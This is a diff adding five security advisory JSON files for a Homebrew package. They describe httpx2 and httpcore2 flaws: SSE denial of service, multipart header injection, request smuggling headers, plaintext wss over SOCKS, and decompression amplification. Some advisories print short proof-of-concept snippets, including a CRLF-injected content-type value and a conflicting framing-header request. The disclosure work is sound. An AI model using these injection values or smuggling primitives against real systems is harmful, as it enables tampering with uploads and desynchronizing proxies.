b/advisories/BREW-strands-agents-sops-CVE-2026-84378.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-strands-agents-sops-CVE-2026-84378", + "published": "2026-09-10T21:05:20Z", + "modified": "2026-09-10T21:05:20Z", + "upstream": [ + "GHSA-f2fp-rgf2-35cp", + "CVE-2026-84378", + "PYSEC-2026-3847" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "strands-agents-sops", + "purl": "pkg:brew/strands-agents-sops" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.1.3" + }, + { + "fixed": "1.1.3_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.10.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Quadratic SSE line buffering can cause CPU denial of service", + "details": "### Summary\n\nHTTPX2's Server-Sent Events (SSE) parser repeatedly copied and rescanned buffered text when a server split one unterminated line across many response chunks. The total work grows quadratically with the length of the line. An attacker-controlled or compromised SSE endpoint can exploit this behavior to consume excessive client CPU.\n\n### Details\n\nBefore version 2.10.0, HTTPX2 combined the complete pending SSE line with each newly received chunk and then scanned the combined text for line separators. If an SSE server sends a long line as many small chunks without a line separator, every chunk causes all previously received text to be copied and scanned again. For `n` fixed-size chunks, this results in O(n²) processing.\n\nThe behavior affects both `httpx2.Client.sse()` and `httpx2.AsyncClient.sse()`. Other response APIs do not use the SSE parsing path.\n\n### Impact\n\nApplications that consume SSE from an attacker-controlled or compromised endpoint can experience excessive CPU usage. A crafted stream can block a synchronous worker or the asynchronous event loop that is consuming it, degrading availability for other work in that process. Confidentiality and integrity are not affected.\n\n### Mitigation\n\nUpgrade to HTTPX2 2.10.0 or later. SSE parsing now accumulates incomplete line fragments and combines them only when necessary, making processing linear in the amount of received data. HTTPX2 2.10.0 also limits buffered SSE events to 1 MiB by default through `max_event_size`.\n\nIf upgrading is not immediately possible, only consume SSE from trusted endpoints and enforce an external size or time budget on the stream.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-f2fp-rgf2-35cp" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84378" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1071" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1117" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/cbfc0e04ef6507da29ccbb3b9c2e5b23dd693414" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.10.0" + } + ] +} diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-84379.json b/advisories/BREW-strands-agents-sops-CVE-2026-84379.json new file mode 100644 index 00000000000..0ac7c3d8959 --- /dev/null +++ b/advisories/BREW-strands-agents-sops-CVE-2026-84379.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-strands-agents-sops-CVE-2026-84379", + "published": "2026-09-10T21:05:20Z", + "modified": "2026-09-10T21:05:20Z", + "upstream": [ + "GHSA-h4x7-gw46-3wm6", + "CVE-2026-84379", + "PYSEC-2026-3848" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "strands-agents-sops", + "purl": "pkg:brew/strands-agents-sops" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.1.3" + }, + { + "fixed": "1.1.3_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.11.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Multipart part header injection via unvalidated file Content-Type and custom headers", + "details": "### Summary\n\nHTTPX2 serializes the per-file `Content-Type` and custom headers supplied through the `files=` tuple API directly into the `multipart/form-data` body without validating custom header names or values. An attacker who can influence upload metadata passed to HTTPX2 can use CR or LF characters to terminate a multipart part header and inject additional part headers or end the part header block early.\n\n### Details\n\nThe three-element file tuple accepts `(filename, content, content_type)`, and the four-element form accepts `(filename, content, content_type, headers)`. `FileField.render_headers()` interpolates the supplied header names and values between CRLF delimiters without validating them.\n\nFor example:\n\n```python\nimport httpx2\n\nrequest = httpx2.Request(\n \"POST\",\n \"https://example.com/upload\",\n headers={\"Content-Type\": \"multipart/form-data; boundary=BOUNDARY\"},\n files={\n \"file\": (\n \"safe.txt\",\n b\"payload\",\n \"text/plain\\r\\nX-Injected: true\",\n )\n },\n)\n\nprint(request.read().decode())\n```\n\nThe generated body contains an attacker-injected part header:\n\n```text\n--BOUNDARY\nContent-Disposition: form-data; name=\"file\"; filename=\"safe.txt\"\nContent-Type: text/plain\nX-Injected: true\n\npayload\n--BOUNDARY--\n```\n\nThe same issue affects names and values in the custom header mapping from the four-element tuple.\n\nField names and filenames are serialized through a separate escaping path and do not permit CRLF header injection.\n\n### Impact\n\nApplications are affected when they pass attacker-controlled upload metadata into the per-file `content_type` or custom `headers` arguments. The receiving server interprets injected lines as genuine multipart part headers. Depending on how that server validates and processes uploads, this can alter part semantics or bypass checks based on part headers.\n\nThis does not split the outer HTTP request: the injected headers are contained within the multipart body. The concrete security impact therefore depends on the downstream multipart parser and application behavior.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.11.0` or later. Patched versions reject forbidden control characters in multipart part header names and values and raise `ValueError` before serializing the request.\n\nIf upgrading is not immediately possible, applications should validate custom multipart header names as HTTP field-name tokens. They should reject NUL, CR, LF, other C0 controls except horizontal tab, and DEL in per-file content types and custom header values before passing them to HTTPX2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-h4x7-gw46-3wm6" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84379" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1142" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/de96d810ee4e309d118982fe7084a46a2bcd600d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.11.0" + } + ] +} diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-84380.json b/advisories/BREW-strands-agents-sops-CVE-2026-84380.json new file mode 100644 index 00000000000..2b979222185 --- /dev/null +++ b/advisories/BREW-strands-agents-sops-CVE-2026-84380.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-strands-agents-sops-CVE-2026-84380", + "published": "2026-09-10T21:05:20Z", + "modified": "2026-09-10T21:05:20Z", + "upstream": [ + "GHSA-pf96-p4fj-6566", + "CVE-2026-84380", + "PYSEC-2026-3849" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "strands-agents-sops", + "purl": "pkg:brew/strands-agents-sops" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.1.3" + }, + { + "fixed": "1.1.3_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.11.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Conflicting Content-Length and Transfer-Encoding headers can be auto-generated", + "details": "### Summary\n\nHTTPX2 can automatically add a `Content-Length` header to a request that already contains a caller-supplied `Transfer-Encoding` header. The resulting HTTP/1.1 request contains both framing headers, which can create an ambiguous message boundary and enable request smuggling or connection desynchronization when processed by intermediaries that disagree about which header takes precedence.\n\n### Details\n\nWhen a request body has a known size, HTTPX2's content encoder returns a default `Content-Length`. `Request._prepare()` applies each default header with `setdefault()`, which only checks whether that same header is already present. It does not check whether the mutually exclusive `Transfer-Encoding` header is present.\n\nFor example:\n\n```python\nimport httpx2\n\nrequest = httpx2.Request(\n \"POST\",\n \"http://example.com/\",\n headers={\"Transfer-Encoding\": \"chunked\"},\n content=b\"test 123\",\n)\n\nprint(request.headers)\n```\n\nThe request contains both:\n\n```text\nTransfer-Encoding: chunked\nContent-Length: 8\n```\n\nOn an HTTP/1.1 connection, the body is serialized using chunked transfer coding while both headers are sent on the wire. This violates HTTP message-framing requirements. Fixed-size byte, JSON, form, and known-length multipart bodies can reach the affected path.\n\nStreaming bodies with an explicit `Content-Length` are not affected in current HTTPX2 releases because the automatically generated `Transfer-Encoding` is already suppressed in that direction.\n\n### Impact\n\nAn attacker may be able to use the conflicting framing headers as a request-smuggling or desynchronization primitive. Exploitation requires an application to pass attacker-controlled request framing headers and associated body data to HTTPX2, use HTTP/1.1, and communicate through a proxy or origin that accepts conflicting headers and interprets them differently from another hop.\n\nDepending on the downstream infrastructure, successful exploitation could interfere with requests sharing a persistent connection, bypass front-end routing or authorization decisions, or poison responses or caches. Applications that do not forward attacker-controlled `Transfer-Encoding` headers are not directly exposed.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.11.0` or later. Patched versions treat `Content-Length` and `Transfer-Encoding` as mutually exclusive when applying automatically generated request headers.\n\nIf upgrading is not immediately possible, remove `Transfer-Encoding` and other hop-by-hop framing headers from untrusted input before constructing outbound requests. Applications acting as proxies should derive outbound framing from the body rather than forwarding inbound `Content-Length` or `Transfer-Encoding` headers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-pf96-p4fj-6566" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84380" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1137" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/829b93a2393212996f613e635261f777d9ec6eab" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.11.0" + } + ] +} diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-84381.json b/advisories/BREW-strands-agents-sops-CVE-2026-84381.json new file mode 100644 index 00000000000..83523ee1f99 --- /dev/null +++ b/advisories/BREW-strands-agents-sops-CVE-2026-84381.json @@ -0,0 +1,98 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-strands-agents-sops-CVE-2026-84381", + "published": "2026-09-10T21:05:19Z", + "modified": "2026-09-10T21:05:19Z", + "upstream": [ + "GHSA-7mj9-2mp8-4m2p", + "CVE-2026-84381", + "PYSEC-2026-3844", + "PYSEC-2026-3845" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "strands-agents-sops", + "purl": "pkg:brew/strands-agents-sops" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.1.3" + }, + { + "fixed": "1.1.3_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.10.0", + "resource": "httpcore2", + "resource_purl": "pkg:pypi/httpcore2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpcore2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpcore2@2.12.0", + "resource": "httpcore2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Secure WebSocket traffic sent without TLS through SOCKS proxies", + "details": "### Summary\n\nhttpcore2 does not start TLS for `wss://` connections routed through a SOCKS5 proxy. The WebSocket opening handshake and all subsequent frames are sent in plaintext through the proxy path, despite the caller selecting the secure `wss` scheme.\n\nThe transport flaw affects httpcore2 releases before `2.10.0`. HTTPX2 exposed this behavior through its public `Client.websocket()` and `AsyncClient.websocket()` APIs from `2.6.0` through `2.9.1`.\n\n### Details\n\nThe synchronous and asynchronous SOCKS5 connection implementations upgrade the established proxy tunnel to TLS only when the remote origin scheme is `https`. The equivalent check does not include `wss`. After the SOCKS5 handshake succeeds, the raw stream is therefore passed directly to the HTTP/1.1 connection, which writes the WebSocket upgrade request without first performing a TLS handshake or verifying the destination certificate.\n\nFor example, an application using HTTPX2 `2.6.0` through `2.9.1` may open an authenticated WebSocket through a SOCKS proxy:\n\n```python\nimport httpx2\n\nwith httpx2.Client(proxy=\"socks5://proxy.example:1080\") as client:\n with client.websocket(\n \"wss://service.example/private?token=query-secret\",\n headers={\"Authorization\": \"Bearer header-secret\"},\n cookies={\"session\": \"cookie-secret\"},\n ) as websocket:\n websocket.send_text(\"private message\")\n```\n\nOn affected versions, the stream passing through the SOCKS proxy begins with a plaintext request such as:\n\n```text\nGET /private?token=query-secret HTTP/1.1\nHost: service.example\nAuthorization: Bearer header-secret\nCookie: session=cookie-secret\n```\n\nBefore HTTPX2 `2.6.0`, the same underlying httpcore2 behavior could be reached by integrations constructing a WebSocket upgrade request through the low-level transport API, but HTTPX2 did not yet provide its native WebSocket client API.\n\nA normal secure WebSocket server will usually reject these plaintext bytes because it expects a TLS ClientHello. However, a malicious or compromised SOCKS proxy can accept the SOCKS connection, observe the plaintext handshake, return a forged `101 Switching Protocols` response, and then read or modify WebSocket frames in both directions. An observer between the proxy and destination may also read the plaintext traffic.\n\nRFC 6455 requires a client using a secure WebSocket connection to perform the TLS handshake before sending the WebSocket opening handshake. A `wss` URI promises confidentiality, integrity, and endpoint authentication through TLS.\n\n### Impact\n\nAn attacker able to control or observe the SOCKS proxy path can obtain URL query parameters, authorization headers, cookies, and application messages that the caller expected TLS to protect. Because no TLS handshake occurs, certificate verification also does not occur, allowing an attacker controlling the proxy to impersonate the WebSocket server and inject or alter messages.\n\nOnly `wss://` connections routed through a SOCKS5 proxy are affected. Direct `wss://` connections and ordinary `https://` requests through SOCKS already start TLS correctly.\n\n### Mitigation\n\nUpgrade HTTPX2 and httpcore2 to `2.10.0` or later. Patched versions start TLS for both `https` and `wss` origins in the synchronous and asynchronous SOCKS5 connection paths.\n\nIf upgrading is not immediately possible, do not route `wss://` connections through a SOCKS proxy. Use a direct secure WebSocket connection or another transport that performs and verifies TLS to the WebSocket origin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-7mj9-2mp8-4m2p" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84381" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1104" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/fb008dd700b761d955210d9692475c3e2f379453" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.10.0" + } + ] +} diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-84382.json b/advisories/BREW-strands-agents-sops-CVE-2026-84382.json new file mode 100644 index 00000000000..b9327c4a687 --- /dev/null +++ b/advisories/BREW-strands-agents-sops-CVE-2026-84382.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-strands-agents-sops-CVE-2026-84382", + "published": "2026-09-10T21:05:20Z", + "modified": "2026-09-10T21:05:20Z", + "upstream": [ + "GHSA-8xx6-hgc6-gc2m", + "CVE-2026-84382", + "PYSEC-2026-3846" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "strands-agents-sops", + "purl": "pkg:brew/strands-agents-sops" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.1.3" + }, + { + "fixed": "1.1.3_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.12.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Streaming response decompression does not bound peak memory (decompression amplification)", + "details": "### Summary\n\nWhen decoding a compressed response body (`gzip`, `deflate`, `br`, or `zstd`), HTTPX2 fully decompressed each network read before yielding content to the application. A small compressed input could therefore cause a large intermediate memory allocation, even when the application streamed the response to keep memory usage bounded.\n\n### Details\n\nHTTPX2's default transport reads the socket in pieces of up to 64 KiB. Before `2.12.0`, each piece was inflated completely into one intermediate allocation before any decompressed bytes were yielded.\n\nAt DEFLATE's maximum compression ratio of roughly 1032:1, a 64 KiB compressed chunk can expand to about 64 MiB in one allocation. Brotli and Zstandard responses can cause similarly large amplification. Streaming the response did not prevent these transient allocations.\n\n### Impact\n\nApplications that fetch resources from untrusted or attacker-influenced servers - such as webhook receivers, link unfurlers, crawlers, SSRF-reachable fetchers, and redirect followers - can experience memory pressure or out-of-memory termination when processing a malicious compressed response. No authentication or user interaction is required beyond issuing a request to the server.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.12.0` or later. Patched versions decompress responses incrementally with bounded intermediate buffers, including responses with multiple content encodings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-8xx6-hgc6-gc2m" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84382" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1126" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/4fd0c70a3f207c618b145934792f791bccfb39f8" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.12.0" + } + ] +}